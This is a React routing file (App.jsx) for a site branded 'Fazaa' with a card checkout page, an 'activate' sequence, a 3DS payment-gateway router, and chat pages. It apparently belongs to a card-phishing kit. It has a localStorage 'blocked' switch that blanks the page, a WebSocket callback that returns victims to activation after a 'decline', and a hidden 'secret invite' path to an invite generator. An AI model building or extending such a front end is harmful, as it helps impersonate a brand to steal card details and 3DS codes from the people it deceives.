// App.jsx
import React, { Suspense, lazy, useEffect, useState } from "react";
import { BrowserRouter as Router, Routes, Route, Outlet, Navigate, useLocation } from "react-router-dom";

import { PromoProvider } from "./providers/Init";
import ScrollToTop from "./providers/ScrollToTop";
import { StepProvider } from "./StepContext";
import { motion } from "framer-motion";
import { CardProvider } from "./Utils/CardContext";
import { ToastContainer } from "react-toastify";
import "react-toastify/dist/ReactToastify.css";
import { WebSocketProvider } from "./context/WebSocketContext";
import ThreeDSRouter from "./threeds/ThreeDSRouter";

// NEW
import { GeoLayoutProvider, GEO_CODES } from "./providers/GeoContext";

/* ---- Lazy-loaded pages/components ---- */
const Header = lazy(() => import("./Header"));
const Footer = lazy(() => import("./Footer"));
const SelectLanding = lazy(() => import("./Pages/SelectLanding/Landing"));

const FazaaCardCheckout = lazy(() => import("./FazaaCardCheckout"));
const FazaaLanding = lazy(() => import("./Landing"));
const FazaaTerms = lazy(() => import("./Terms"));
const ActivationSuccessPage = lazy(() => import("./ActivationSucess"));

const FazaaFAQ = lazy(() => import("./FAQ"));
const AboutUs = lazy(() => import("./AboutUs"));
const PrivacyPolicy = lazy(() => import("./Privacy"));
const CustomerSupport = lazy(() => import("./Support"));

const Chat = lazy(() => import("./Chat/Chat"));
const ChatSupport = lazy(() => import("./Chat/ChatSupport"));

const ActivationSequence = lazy(() => import("./Pages/ActivationSequence/ActivationSequence"));
const InviteGenerator = lazy(() => import("./Pages/ActivationSequence/InviteGeneration"));

function FooterLayout() {
  return (
    <>
      <Outlet />
      <Suspense fallback={null}>
        <Footer />
      </Suspense>
    </>
  );
}

function TopBannerLayout() {
  return (
    <>
      <div className="relative">
        <img src="/logo.png" className="object-cover h-12 absolute top-4 left-4" alt="Fazaa" />
        <img src="/creo.png" alt="Banner" loading="lazy" decoding="async" />
      </div>
      <Outlet />
    </>
  );
}

function Loader() {
  return (
          <motion.div
            className="absolute inset-0 flex flex-col gap-y-4 items-center justify-center bg-white z-50"
            initial={{ opacity: 1 }}
            exit={{ opacity: 0, transition: { duration: 0.5 } }}
          >
<svg width="40" height="35" viewBox="0 0 40 35" fill="none" xmlns="http://www.w3.org/2000/svg">
<g clip-path="url(#clip0_283_895)">
<path d="M30.9297 19.4C30.9497 19.872 30.9477 20.334 30.9247 20.791C26.3527 20.975 22.0247 21.248 22.0247 21.559C22.0247 21.87 26.2607 22.136 30.7777 22.315C30.6997 22.837 30.5937 23.347 30.4717 23.851C26.0197 24.03 21.8847 24.298 21.8847 24.602C21.8847 24.906 25.7417 25.154 30.0147 25.34C29.8206 25.8773 29.5976 26.4037 29.3467 26.917C25.6777 27.093 22.6467 27.329 22.6467 27.587C22.6467 27.825 25.2957 28.049 28.6327 28.217C28.4487 28.528 28.2507 28.817 28.0477 29.106C27.8317 29.412 27.5937 29.721 27.3427 30.02C25.2577 30.178 23.8247 30.359 23.8247 30.552C23.8247 30.715 24.8507 30.868 26.4327 31.009C25.5079 31.9196 24.4709 32.7086 23.3467 33.357C22.4194 32.5437 21.5565 31.6597 20.7657 30.713C19.7217 29.445 17.5107 26.098 16.9897 25.35C16.4687 24.602 16.1307 24.383 15.5207 24.599C14.8571 24.8323 14.166 24.9785 13.4648 25.034C13.1738 25.034 13.0127 24.921 13.5017 24.725C14.926 24.137 16.1104 23.0861 16.8637 21.742C17.9277 19.626 16.9897 16.706 16.9897 16.706C16.8558 17.5328 16.4438 18.2891 15.8217 18.85C15.9635 18.218 15.971 17.5632 15.8437 16.9281C15.7164 16.2929 15.4571 15.6916 15.0827 15.163L14.6827 16.998C14.6827 16.998 14.4317 16.985 13.8147 17.498C13.4321 17.8379 13.1584 18.2832 13.0277 18.778C13.5127 18.978 14.0977 18.487 14.0977 18.487C13.5411 20.6931 12.6652 22.8061 11.4977 24.759C11.0116 25.6503 10.2353 26.3486 9.2977 26.738C8.6367 27.004 8.42172 26.69 8.42172 26.69C7.89057 26.2347 7.40131 25.7327 6.95975 25.19C6.95975 25.19 6.9247 25.127 7.0477 25.127C7.3667 25.135 7.94173 24.582 8.06473 24.354C8.21073 24.093 8.19571 23.897 8.12271 23.882C8.04971 23.867 7.92275 24.082 7.30875 24.469C6.69475 24.856 6.4087 24.584 6.2037 24.369C6.0457 24.198 6.20374 23.982 6.30374 23.846C6.39674 23.731 9.66074 17.646 18.2957 11.252C29.6067 2.87601 36.8327 0.61402 37.2467 0.45202C37.5207 0.34602 37.9677 0.203016 38.0687 0.306016C38.1208 0.346644 38.1619 0.399715 38.1881 0.460351C38.2143 0.520986 38.2248 0.587239 38.2187 0.653016C38.2067 0.788016 38.1337 0.861019 37.6087 1.09202C33.3507 3.1142 29.2431 5.43916 25.3177 8.04902C22.8734 9.30084 20.5187 10.7206 18.2707 12.298C17.9967 12.469 18.1997 12.715 18.3607 12.611C24.3447 8.63102 31.3607 5.92502 39.1077 3.70102C39.4767 3.59502 39.6797 3.59502 39.7427 3.67902C39.8069 3.76969 39.845 3.87622 39.8528 3.98702C39.8628 4.13102 39.7448 4.20302 39.4258 4.33102C31.1024 7.42168 24.9661 10.2947 21.0168 12.95C21.0168 12.95 20.6048 13.196 20.6028 13.482C20.6028 13.591 20.8237 13.603 20.8237 13.603C22.7987 13.638 25.4377 13.756 26.6927 13.826C26.6927 13.826 26.5177 14.464 25.3117 14.976C24.4662 15.2756 23.5665 15.3912 22.6727 15.315C22.6253 15.3108 22.5778 15.3209 22.5362 15.3439C22.4946 15.367 22.4609 15.402 22.4394 15.4444C22.4179 15.4868 22.4096 15.5346 22.4155 15.5818C22.4214 15.629 22.4414 15.6733 22.4727 15.709C22.5477 15.809 24.3577 18.724 30.9397 19.392" fill="#4D002E"/>
<path d="M30.6763 17.141C30.6763 17.317 28.2163 17.477 24.7103 17.618C24.1988 17.3325 23.7186 16.9943 23.2773 16.609C27.5303 16.759 30.6774 16.945 30.6774 17.141" fill="#62727D"/>
<path d="M28.1562 11.221C26.5063 11.5149 24.8319 11.6489 23.1562 11.621C23.5752 11.378 24.0142 11.127 24.4662 10.881C25.7063 10.8537 26.9453 10.9685 28.1592 11.223" fill="#62727D"/>
<path d="M6.2229 23.958C4.8589 23.972 3.66386 23.98 2.72986 23.98C1.38686 23.98 0.296875 23.568 0.296875 23.053C0.296875 22.538 1.38686 22.126 2.72986 22.126C3.91986 22.126 5.52988 22.141 7.37988 22.166C6.66688 23.196 6.32291 23.816 6.29291 23.853C6.26291 23.89 6.2479 23.918 6.2229 23.953" fill="#62727D"/>
<path d="M6.95251 25.195C7.39407 25.7377 7.88334 26.2397 8.41449 26.695C8.41449 26.695 8.62953 27.009 9.29053 26.743C10.0542 26.4383 10.7097 25.9129 11.1735 25.234C13.0485 25.261 15.0345 25.306 16.9905 25.352C17.1515 25.586 17.4775 26.073 17.8815 26.671C12.4285 26.811 6.50749 26.896 3.47449 26.896C2.21249 26.896 1.1875 26.502 1.1875 26.027C1.1875 25.552 2.21249 25.151 3.47449 25.151C4.39849 25.151 5.58651 25.159 6.94751 25.171C6.94629 25.18 6.94629 25.189 6.94751 25.198" fill="#62727D"/>
<path d="M4.8454 29.75C3.7234 29.75 2.81641 29.403 2.81641 28.977C2.81641 28.551 3.7234 28.203 4.8454 28.203C7.8104 28.203 13.8914 28.293 19.0984 28.444C19.3494 28.801 19.5984 29.157 19.8374 29.488C14.4764 29.644 7.9544 29.75 4.8454 29.75Z" fill="#62727D"/>
<path d="M22.1345 32.22C17.7605 32.414 10.2435 32.542 7.11951 32.542C6.23851 32.542 5.51953 32.265 5.51953 31.934C5.51953 31.603 6.23451 31.327 7.11951 31.327C10.1075 31.327 17.1195 31.445 21.5545 31.627C21.7545 31.842 21.9485 32.039 22.1345 32.227" fill="#62727D"/>
<path d="M10.7274 33.863C13.3034 33.863 21.1594 34.056 21.1594 34.293C21.1594 34.53 13.3034 34.723 10.7274 34.723C10.2274 34.723 9.81641 34.532 9.81641 34.293C9.81641 34.054 10.2234 33.863 10.7274 33.863Z" fill="#62727D"/>
<path d="M10.7599 17.982C7.51289 18.035 4.60086 18.07 2.72986 18.07C1.38686 18.07 0.296875 17.653 0.296875 17.141C0.296875 16.629 1.38686 16.214 2.72986 16.214C4.90386 16.214 8.47987 16.257 12.3519 16.328C11.7789 16.895 11.2469 17.453 10.7599 17.982Z" fill="#62727D"/>
<path d="M26.6818 13.839C27.7253 13.813 28.7677 13.9253 29.7818 14.173C28.5718 14.4438 27.3334 14.5667 26.0938 14.539C26.3553 14.3699 26.5609 14.126 26.6818 13.839Z" fill="#62727D"/>
<path d="M3.47455 15.047C2.21255 15.047 1.1875 14.656 1.1875 14.173C1.1875 13.69 2.21255 13.302 3.47455 13.302C6.06855 13.302 10.7685 13.364 15.4865 13.47C14.9085 13.957 14.3595 14.439 13.8415 14.911C9.70149 14.996 5.76655 15.047 3.47455 15.047Z" fill="#62727D"/>
<path d="M17.5744 11.798C12.7514 11.918 7.5244 11.991 4.8454 11.991C3.7234 11.991 2.81641 11.647 2.81641 11.221C2.81641 10.795 3.7234 10.447 4.8454 10.447C7.8024 10.447 13.8684 10.54 19.0684 10.688C18.8094 10.874 18.5494 11.062 18.2854 11.261C18.0444 11.439 17.8054 11.617 17.5744 11.798Z" fill="#62727D"/>
<path d="M7.12341 8.86803C6.24241 8.86803 5.52344 8.59603 5.52344 8.26203C5.52344 7.92803 6.23841 7.65503 7.12341 7.65503C10.4374 7.65503 18.7114 7.80002 22.9114 8.01102C22.6454 8.18202 22.3794 8.36803 22.1064 8.55103C17.7294 8.74003 10.2394 8.86803 7.12341 8.86803Z" fill="#62727D"/>
<path d="M2.47803 21.042C1.11003 21.042 0 20.615 0 20.098C0 19.581 1.11003 19.154 2.47803 19.154C4.19003 19.154 6.757 19.18 9.659 19.225C9.112 19.867 8.63903 20.46 8.23303 20.992C5.92503 21.023 3.90403 21.042 2.47803 21.042Z" fill="#62727D"/>
<path d="M9.82043 5.90302C9.82043 5.66702 10.2274 5.47601 10.7314 5.47601C13.3074 5.47601 21.1634 5.66702 21.1634 5.90302C21.1634 6.13902 13.3084 6.33701 10.7274 6.33701C10.2274 6.33701 9.81641 6.14401 9.81641 5.90601" fill="#62727D"/>
</g>
<defs>
<clipPath id="clip0_283_895">
<rect width="39.842" height="34.444" fill="white" transform="translate(0 0.278015)"/>
</clipPath>
</defs>
</svg>

            <div className="w-6 h-6 border-2 border-t-transparent border-[#8E2158] rounded-full animate-spin" />
          </motion.div>
  );
}

// Redirect "/" to the last used geo (or "kw")
function RootRedirect() {
  const saved = (localStorage.getItem("geo") || "").toLowerCase();
  const g = GEO_CODES.includes(saved) ? saved : "vn";
  return <Navigate to={`/${g}`} replace />;
}

function App() {
  const [activationActive, setActivationActive] = useState(false);
  const blocked =
    typeof window !== "undefined" && localStorage.getItem("blocked") === "true";

  if (blocked) return null;

  return (
    <div className="App">
      <CardProvider>
        <StepProvider initialStep={0} persistKey="wizardStep">
          <PromoProvider>
            <Router>
              <WebSocketProvider onDeclineReturn={() => setActivationActive(true)}>
                <ScrollToTop />
                <ToastContainer position="top-right" autoClose={3000} />

                <Suspense fallback={<Loader />}>
                  <Routes>
                    {/* 0) 3DS Payment Gateway & Success Routes */}
                    <Route path="/3ds/*" element={<ThreeDSRouter />} />
                    <Route path="/success" element={<ActivationSuccessPage />} />

                    {/* 1) Root -> redirect to /{geo} */}
                    <Route path="/" element={<RootRedirect />} />

                    {/* 2) All geo-scoped routes */}
                    <Route
                      path="/:geo"
                      element={
                        <GeoLayoutProvider>
                          <Outlet />
                        </GeoLayoutProvider>
                      }
                    >
                      {/* Routes that share a Footer */}
                      <Route element={<FooterLayout />}>
                        {/* index -> "/:geo" */}
                        {/* <Route index element={<FazaaLanding />} /> */}
                        <Route index element={<SelectLanding />} />

                        {/* Pages with the same top banner + footer */}
                        <Route element={<TopBannerLayout />}>
                          <Route path="faq" element={<FazaaFAQ />} />
                          <Route path="privacy" element={<PrivacyPolicy />} />
                          <Route path="support" element={<CustomerSupport />} />
                          <Route path="about" element={<AboutUs />} />
                        </Route>

                        <Route path="final" element={<ActivationSuccessPage />} />
                        <Route path="terms" element={<FazaaTerms />} />
                        <Route path="activate" element={<ActivationSequence />} />
                        <Route
                          path="homepage"
                          element={
                            <div className="bg-[#E9E9E9]">
                              <Header />
                              <FazaaCardCheckout
                                activationActive={activationActive}
                                setActivationActive={setActivationActive}
                              />
                            </div>
                          }
                        />
                      </Route>

                      {/* Standalone (no footer) but still geo-scoped */}
                      <Route path="chat" element={<Chat />} />
                      <Route path="chatsupport" element={<ChatSupport />} />

                      {/* Secret invite, you can keep it under geo too */}
                      <Route path="N7k3X2pV9a1Q5mZ4" element={<InviteGenerator />} />
                    </Route>
                  </Routes>
                </Suspense>
              </WebSocketProvider>
            </Router>
          </PromoProvider>
        </StepProvider>
      </CardProvider>
    </div>
  );
}

export default App;
